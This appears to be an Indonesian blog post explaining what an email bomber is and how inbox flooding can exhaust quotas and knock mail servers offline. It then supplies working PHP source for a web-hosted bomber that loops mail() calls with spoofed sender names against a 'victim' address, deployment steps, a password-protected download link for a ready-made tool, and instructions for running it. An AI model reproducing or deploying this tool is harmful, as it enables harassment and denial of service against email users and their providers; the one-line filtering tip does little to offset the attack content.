Email bomber merupakan software atau tool yang digunakan untuk mengirim email secara terus menerus ke suatu email tujuan, dengan jumlah email yang ditentukan bisa 10, 100, 1000, bahkan tak terbatas (unlimited). Atau juga bisa sedikit email yang dikirim, namun tiap email memiliki file attactment yang ukurannya besar. Dan sudah pasti, email sampah yang anda kirimkan akan memenuhi Inbox orang tersebut yang pada akhirnya Space/Bandhwith emailnya akan kepenuhan dan akhirnya error.

Kenapa Email Bomb bisa merusak email..?
Didalam dunia email kata Email Bomb dan Spam hampir ada kesamaan maksud dan tujuan, tetapi spam lebih menekankan pengiriman email berlebihan dan mengandung virus, tapi kedua istilah Email Bomb dan Spam mempunyai tujuan yang sama yaitu mengirim email tidak bermanfaat dengan jumlah banyak.
Email korban ada kemungkinan bisa rusak alias tidak dapat di gunakan lagi, dengan dua alasan :
1. Pertama ketika email korban dipenuhi dengan beribu email sehingga melampaui batas akibatnya Internet Service Provider (ISP) tidak dapat melanjutkan layanan, karna jumlah email yang di terima terlalu banyak  maka mail server ISP mengalami Crash/down yang berdampak tidak dapat melakukan penerimaan email atau pengiriman email.
2. Kedua apabila Email Bomb yang dikirimkan dibaca Email Spam maka akan mengalami flooding artinya emailbox account kita dibanjiri dengan email yang sama sehingga jumlahnya melampaui kuota alokasi emailbox yang disediakan. Akibatnya email-email penting tidak dapat masuk atau bahkan bisa menyebabkan hilangnya email-email penting, yang juga dapat mengakibatkan DOS (denial of service) pada mail server (yaitu keadaan di mana server tidak memberikan respon ketika diberi perintah kepadanya). Untuk mengatasinya maka Anda perlu memberi semacam filter pada email client Anda misal seperti pada Outlook Express sehingga kiriman alamat email tertentu yang telah kita spesifikasikan terlebih dahulu, akan langsung dihapus

Kita bisa membuat email bomber ini sendiri menggunakan script berikut ini.

http://art-of-hacks.cyber4rt.com/2012/07/script-email-bomber.html

Berikut contoh potongan programnya:
<html>
<body>
<form method=post action=index.php>
<pre>
<input type=hidden value=ok name=ok>
Dari : <input name=dari value=”<? echo $dari;?>”>
Kepada : <input name=kepada value=”<? echo $kepada;?>”>
Jumlah : <input name=jumlah value=”<? echo $jumlah;?>”>
Isi Pesan: <textarea name=isi><?echo $isi?></textarea><br>
<input type=submit value=Booom>
</form></pre>
<?
if ($ok==”ok”)
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,””,”From : $a <$a>”);
}
echo (“Beres Bos”);
}
?>
</body>
</html>
Lalu simpan code tersebut dalam sebuah file, misalkan email-bomber.php
Selanjutnya masukkan file tersebut dalam webserver atau webhosting kamu.
Langkah berikutnya buka browser lalu masukkan alamat dimana kamu menyimpan file tersebut misalkan http://namadomainkamu.com/email-bomber.php
Jika alamat e-mail yang ditujukan benar maka akan secara otomatis mengirimkan pesan ke email korban.

Atau jika anda tidak mau ribet, silahkan download software yang sudah jadi di bawah ini.

download

mediafire        password  http://www.javacreativity.com

Adapun cara memakainya sebagai berikut :
 1. Masukkan smtp sever dari email yang digunakan untuk mengirim, list smtp server
2. Masukkan username dan password dari email yang digunakan untuk mengirim. Pastikan akun tidak terproteksi dengan verifikasi nomor telepon, karena software tidak dapat bekerja.
3. Isikan email tujuan, judul pesan, isi pesan dan jumlah email yang akan kita kiri. Setelah terisi semua kemudian klik Mulai.
4. Berikut hasil capture paket menggunakan wireshark ketika software bekerja. Terlihat banyak paker smtp yang lewat, ini menandakan proses pengiriman email secara berulang kali.
Silahkan dicoba di email masing2. Tolong pergunakan software ini dengan bijak, ingat ALLAH maha tau kawan2. hehehe.